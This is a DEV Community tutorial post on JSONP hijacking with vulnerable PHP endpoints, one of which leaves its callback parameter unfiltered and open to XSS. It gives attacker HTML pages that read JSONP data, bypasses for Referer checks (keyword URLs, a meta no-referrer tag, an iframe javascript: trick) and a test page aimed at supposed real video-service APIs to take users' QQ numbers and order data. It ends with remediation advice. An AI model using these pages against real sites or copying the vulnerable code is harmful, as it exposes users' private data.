DEV Community

Cover image for Talking about JSONP Hijacking Vulnerability
TutorialBoy
TutorialBoy

Posted on

2

Talking about JSONP Hijacking Vulnerability

JSONP

The full name of JSONP is JSON with Padding, a solution based on JSON format to solve cross-domain request resources.

Due to the limitation of the browser's same-origin policy, the browser only allows XmlHttpRequest to request resources with the same current (domain name, protocol, port), and there is no restriction on requesting script resources.

Principle: The client sends a cross-domain request through the request script tag, and then the server outputs JSON data and executes the callback function. This cross-domain data output method is called JSONP. Simple principle description: use

Hazards that can be caused

  • JSONP data hijacking
  • callback xss caused by no filtering

JSONP Hijacking Example

# Server request address: http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback
<?php
header('Content-type: application/json');
$callback = htmlspecialchars($_REQUEST['callback']);
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

Enter fullscreen mode Exit fullscreen mode
# Client request address: http://127.0.0.1/jsonp/jsonp_test.html
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp</title>
</head>
<body>
    jsonp hijack test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>
Enter fullscreen mode Exit fullscreen mode

JSONP hijacking bypass method

Referer filtering (regular) is not rigorous
for example http://aphp.test/jsonp/test_jsonp.php? callback=jsonCallback When outputting data, the Referer is verified

But unfortunately, it only verifies whether the keyword aphp. test exists in the Referer.
Then the attacker can construct the url: http://127.0.0.1/aphp.test.html or http://127.0.0.1/attack.htm? aphp.test

Construct such a url to launch an attack to bypass the Referer defense

Empty Referer bypass

Sometimes developers will allow the Referer source to be empty when filtering because under normal circumstances, the browser directly accesses a URL without a Referer, so we can sometimes use this feature to bypass

# Use the <meta> tag to implement an empty Referer
<!DOCTYPE html>
<html lang='en'>
<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>
Enter fullscreen mode Exit fullscreen mode
# Use the <iframe> tag to call the javscript pseudo-protocol to implement an empty Referer call JSON file
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <iframe src="javascript:'<script>function jsonCallback(data){alert(JSON.stringify(data));}</script> <script src=http://aphp.test/jsonp/test_jsonp.php? callback=jsonCallback></script>'" frameborder="0"></iframe>
</html>
Enter fullscreen mode Exit fullscreen mode

The callback can define the security problem caused
In general development, the front-end can be easily called, and the general output Callback is customizable, which leads to xss if the filtering is not strict, or if the Content-Type is not set properly

Note: Strictly speaking, if the output data is also controllable by the attacker, it may also cause harm, but this article emphasizes the output point of Callback
Test a piece of code as follows

<?php
$callback = $_REQUEST['callback'];
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

Enter fullscreen mode Exit fullscreen mode

Test Html code

<!DOCTYPE html>
<html lang='en'>

<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp hijack</title>
</head>

<body>
    https://v.qq.com jsonp hijacking
</body>
    <!-- Hijacking the user's QQ number can be used for promotion -->
    <script>function jc(data){alert(JSON.stringify(data));}</script>
    <script src="http://node.video.google.com/x/api/get_2029?callback=jc&_=1542534620161"></script>

    <!-- Hijack the user's order data -->
    <script>function jc2(data){alert(JSON.stringify(data));}</script>
    <script src="http://like.video.google.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script>
</html>
Enter fullscreen mode Exit fullscreen mode

JSONP Remediation

  • Verify HTTP Referer header information.
  • Add csrfToken to the request and validate it on the backend.
  • Standard output in JSON format, Content-Type is set to (Content-Type : application/json; charset=utf-8).
  • Strictly filter the callback function name and the output of data in JSON (prevent xss)

Source :- https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.html

API Trace View

Struggling with slow API calls?

Dan Mindru walks through how he used Sentry's new Trace View feature to shave off 22.3 seconds from an API call.

Get a practical walkthrough of how to identify bottlenecks, split tasks into multiple parallel tasks, identify slow AI model calls, and more.

Read more →

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Discover a treasure trove of wisdom within this insightful piece, highly respected in the nurturing DEV Community enviroment. Developers, whether novice or expert, are encouraged to participate and add to our shared knowledge basin.

A simple "thank you" can illuminate someone's day. Express your appreciation in the comments section!

On DEV, sharing ideas smoothens our journey and strengthens our community ties. Learn something useful? Offering a quick thanks to the author is deeply appreciated.

Okay